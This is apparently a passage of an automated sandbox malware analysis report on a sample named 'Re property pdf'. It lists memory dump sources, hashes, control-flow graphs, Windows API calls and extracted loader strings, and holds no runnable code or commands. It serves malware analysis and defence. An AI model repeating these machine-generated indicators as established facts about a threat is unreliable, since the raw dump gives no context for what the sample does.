                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: a57815f2edaef03191f11afb3e8b239f2555e299df2bab38f5e530724c00e74c
                                                                                                                              • Instruction ID: 5cd7f98b51dd48f499db8112f9e8aec8fda65e0f37dcb07ce2d2d6b9dd72eb6c
                                                                                                                              • Opcode Fuzzy Hash: a57815f2edaef03191f11afb3e8b239f2555e299df2bab38f5e530724c00e74c
                                                                                                                              • Instruction Fuzzy Hash: ED90023160550402E24071598514707100597D0201F65C412B8824568DC7958E516AA2

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 0 413b6b-413b77 1 413b00-413b06 0->1 2 413b79-413b82 0->2 3 413b83-413b93 2->3 4 413b94 3->4 5 413b95-413b9b 4->5 6 413b9d-413ba1 5->6 7 413c0e-413c1c 5->7 10 413ba3-413bab 6->10 11 413b6a 6->11 8 413c1f-413c24 7->8 9 413bae-413bb3 7->9 13 413c26-413c2b 8->13 14 413c4f-413c62 8->14 9->4 12 413bb5-413bbc 9->12 10->3 15 413bad 10->15 16 413bda-413bde 12->16 17 413bbe-413bcf 12->17 18 413c86-413c99 13->18 19 413c2d-413c49 13->19 14->18 15->9 16->5 22 413be0-413c01 16->22 20 413bd1-413bd8 17->20 21 413b64 17->21 24 413c9b-413ca0 18->24 25 413cca-413ceb call 42e343 call 42ed53 18->25 20->16 21->11 33 413c02-413c0d 22->33 26 413ca3-413ca4 24->26 29 413ced-413d2d call 417483 call 404603 call 424a73 25->29 28 413ca6-413cad 26->28 26->29 28->26 32 413caf-413cc1 28->32 42 413d4d-413d53 29->42 43 413d2f-413d3e PostThreadMessageW 29->43 33->7 33->33 43->42 44 413d40-413d4a 43->44 44->42
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2171525341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_Re property pdf.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 15IDF6Mq$15IDF6Mq
                                                                                                                              • API String ID: 0-4010031901
                                                                                                                              • Opcode ID: 0c054b2e2743c0eeebd6be58e9f5c20462628b9db88d6ef38060c3b80f84a4a8
                                                                                                                              • Instruction ID: ebba4b18cca7dcd981ad835e14fc0cccd4e2cf3c00ace72577cf58a60fdd8a72
                                                                                                                              • Opcode Fuzzy Hash: 0c054b2e2743c0eeebd6be58e9f5c20462628b9db88d6ef38060c3b80f84a4a8
                                                                                                                              • Instruction Fuzzy Hash: 95510E72544259AFDB10DE74DC41AEEFB78EF02B65F54409EE804AB202E32D8A86C7D5

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • PostThreadMessageW.USER32(15IDF6Mq,00000111,00000000,00000000), ref: 00413D3A
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2171525341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_Re property pdf.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePostThread
                                                                                                                              • String ID: 15IDF6Mq$15IDF6Mq
                                                                                                                              • API String ID: 1836367815-4010031901
                                                                                                                              • Opcode ID: e376cca1ad9bd8a113c4203a4ffe58d65e338f52ece443c5481eb9a3b4813f4b
                                                                                                                              • Instruction ID: 16e16fc7eac4357e8694f6d27673bc8143868d4d6300a36bccf1126233710ccb
                                                                                                                              • Opcode Fuzzy Hash: e376cca1ad9bd8a113c4203a4ffe58d65e338f52ece443c5481eb9a3b4813f4b
                                                                                                                              • Instruction Fuzzy Hash: 4D01D6B2D4015C7ADB10AAE19C81DEF7B7CDF41794F048069FA14A7241D57C4F0687B5

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 743 42c543-42c584 call 404693 call 42d453 RtlAllocateHeap
                                                                                                                              APIs
                                                                                                                              • RtlAllocateHeap.NTDLL(?,0041E234,?,?,00000000,?,0041E234,?,?,?), ref: 0042C57F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2171525341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_Re property pdf.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocateHeap
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1279760036-0
                                                                                                                              • Opcode ID: 6131e9b8769fd76ef58628b03dbce2fc44f0f733c409865169e0a5bc9ebd3aa8
                                                                                                                              • Instruction ID: 88e57f121077c93bfb3ac01a0126dec20d148ab05c2f338d53066e093961bc1b
                                                                                                                              • Opcode Fuzzy Hash: 6131e9b8769fd76ef58628b03dbce2fc44f0f733c409865169e0a5bc9ebd3aa8
                                                                                                                              • Instruction Fuzzy Hash: 98E06D75604304BBC610EE59EC41F9B73ACEFC9714F00441AFA0CA7241D674B910CAB8

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 748 42c593-42c5d7 call 404693 call 42d453 RtlFreeHeap
                                                                                                                              APIs
                                                                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,98BADCFE,00000007,00000000,00000004,00000000,00416D04,000000F4), ref: 0042C5D2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2171525341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_Re property pdf.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FreeHeap
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3298025750-0
                                                                                                                              • Opcode ID: ba06928bb99b711efa01ad95a516d20c5fcccbcb308da22b3f919219b40991e2
                                                                                                                              • Instruction ID: bfa113c57d58501489df2f20a837258d55bee8994ce296129a5bc18aab46574b
                                                                                                                              • Opcode Fuzzy Hash: ba06928bb99b711efa01ad95a516d20c5fcccbcb308da22b3f919219b40991e2
                                                                                                                              • Instruction Fuzzy Hash: 6FE06D716043147BC610EE99EC41F9B77ACDFC9714F008419FA0CA7241DA74BD108AB8

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 758 42c5e3-42c61c call 404693 call 42d453 ExitProcess
                                                                                                                              APIs
                                                                                                                              • ExitProcess.KERNEL32(?,00000000,00000000,?,E2D3A29D,?,?,E2D3A29D), ref: 0042C617
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2171525341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_Re property pdf.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ExitProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 621844428-0

                                                                                                                              Control-flow Graph

                                                                                                                              control_flow_graph 763 1042c0a-1042c0f 764 1042c11-1042c18 763->764 765 1042c1f-1042c26 LdrInitializeThunk 763->765
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 0-2160512332
                                                                                                                              Strings
                                                                                                                              • corrupted critical section, xrefs: 010754C2
                                                                                                                              • Critical section address, xrefs: 01075425, 010754BC, 01075534
                                                                                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010754E2
                                                                                                                              • 8, xrefs: 010752E3
                                                                                                                              • Address of the debug info found in the active list., xrefs: 010754AE, 010754FA
                                                                                                                              • Thread identifier, xrefs: 0107553A
                                                                                                                              • double initialized or corrupted critical section, xrefs: 01075508
                                                                                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010754CE
                                                                                                                              • undeleted critical section in freed memory, xrefs: 0107542B
                                                                                                                              • Critical section address., xrefs: 01075502
                                                                                                                              • Invalid debug info address of this critical section, xrefs: 010754B6
                                                                                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 01075543
                                                                                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0107540A, 01075496, 01075519
                                                                                                                              • Critical section debug info address, xrefs: 0107541F, 0107552E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                              • API String ID: 0-2368682639
                                                                                                                              Strings
                                                                                                                              • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 010722E4
                                                                                                                              • RtlpResolveAssemblyStorageMapEntry, xrefs: 0107261F
                                                                                                                              • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 010725EB
                                                                                                                              • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 010724C0
                                                                                                                              • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01072498
                                                                                                                              • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01072602
                                                                                                                              • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01072624
                                                                                                                              • @, xrefs: 0107259B
                                                                                                                              • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01072506
                                                                                                                              • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01072409
                                                                                                                              • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01072412
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                              • API String ID: 0-4009184096
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                              • API String ID: 0-2515994595
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                              • API String ID: 0-1700792311
                                                                                                                              Strings
                                                                                                                              • VerifierDlls, xrefs: 01088CBD
                                                                                                                              • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01088A67
                                                                                                                              • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01088A3D
                                                                                                                              • VerifierDebug, xrefs: 01088CA5
                                                                                                                              • HandleTraces, xrefs: 01088C8F
                                                                                                                              • AVRF: -*- final list of providers -*- , xrefs: 01088B8F
                                                                                                                              • VerifierFlags, xrefs: 01088C50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                              • API String ID: 0-3223716464
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                              • API String ID: 0-1109411897
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                              Strings
                                                                                                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01059A01
                                                                                                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 010599ED
                                                                                                                              • apphelp.dll, xrefs: 00FF6496
                                                                                                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01059A2A
                                                                                                                              • LdrpInitShimEngine, xrefs: 010599F4, 01059A07, 01059A30
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01059A11, 01059A3A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                              Strings
                                                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01072180
                                                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01072178
                                                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 010721BF
                                                                                                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0107219F
                                                                                                                              • SXS: %s() passed the empty activation context, xrefs: 01072165
                                                                                                                              • RtlGetAssemblyStorageRoot, xrefs: 01072160, 0107219A, 010721BA
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                              Strings
                                                                                                                              • LdrpInitializeProcess, xrefs: 0103C6C4
                                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01078181, 010781F5
                                                                                                                              • Loading import redirection DLL: '%wZ', xrefs: 01078170
                                                                                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 010781E5
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0103C6C3
                                                                                                                              • LdrpInitializeImportRedirection, xrefs: 01078177, 010781EB
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 01042DF0: LdrInitializeThunk.NTDLL ref: 01042DFA
                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01040BA3
                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01040BB6
                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01040D60
                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01040D74
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                              Strings
                                                                                                                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0103855E
                                                                                                                              • LdrpInitializeProcess, xrefs: 01038422
                                                                                                                              • @, xrefs: 01038591
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01038421
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                              Strings
                                                                                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 010721D9, 010722B1
                                                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 010722B6
                                                                                                                              • SXS: %s() passed the empty activation context, xrefs: 010721DE
                                                                                                                              • .Local, xrefs: 010328D8
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                              Strings
                                                                                                                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01061028
                                                                                                                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01060FE5
                                                                                                                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0106106B
                                                                                                                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 010610AE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                              Strings
                                                                                                                              • apphelp.dll, xrefs: 01022462
                                                                                                                              • LdrpDynamicShimModule, xrefs: 0106A998
                                                                                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0106A992
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0106A9A2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                              Strings
                                                                                                                              • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0101327D
                                                                                                                              • HEAP: , xrefs: 01013264
                                                                                                                              • HEAP[%wZ]: , xrefs: 01013255
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                              • API String ID: 0-617086771
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                              • API String ID: 0-4253913091
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: $@
                                                                                                                              • API String ID: 0-1077428164
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                              • API String ID: 0-2779062949
                                                                                                                              Strings
                                                                                                                              • LdrpCheckModule, xrefs: 0106A117
                                                                                                                              • Failed to allocated memory for shimmed module list, xrefs: 0106A10F
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0106A121
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
